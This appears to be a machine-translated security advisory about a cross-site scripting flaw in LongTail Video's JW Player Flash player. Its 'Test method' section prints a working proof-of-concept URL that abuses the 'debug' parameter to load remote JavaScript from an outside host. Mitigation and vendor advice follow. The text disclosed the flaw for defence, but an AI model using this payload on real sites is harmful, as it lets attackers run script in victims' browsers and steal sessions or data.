Release date:
Updated on:
Affected Systems:
LongTail Video
Description:
--------------------------------------------------------------------------------
LongTail Video is a leading company in the online Video market in New York. Its flagship product is JW Video player.
The coding of the JWPlayerFLASH video player has security issues. Remote attackers can exploit this vulnerability to execute cross-site scripting attacks.
<* Source: gainover
Link: http://www.wooyun.org/bugs/wooyun-2010-07166
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Gainover () provides the following test methods:
Http://player.longtailvideo.com/player.swf? Debug = (function () % 7Blocation. href % 3D 'javascript % 3A % 22% 3 Cscript % 2 Fsrc % 3D % 5C '% 2F % 2Fappmaker.sinaapp.com % 5C % 2Ftest5. js % 5C '% 3E % 3C % 2 Fscript % 3E % 22' % 7D)
Suggestion:
--------------------------------------------------------------------------------
Temporary solution:
If you cannot install or upgrade the patch immediately, NSFOCUS recommends that you take the following measures to reduce the threat:
* Restrict the length of the "debug" parameter and check its content.
Vendor patch:
LongTail Video
--------------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Www.longtailvideo.com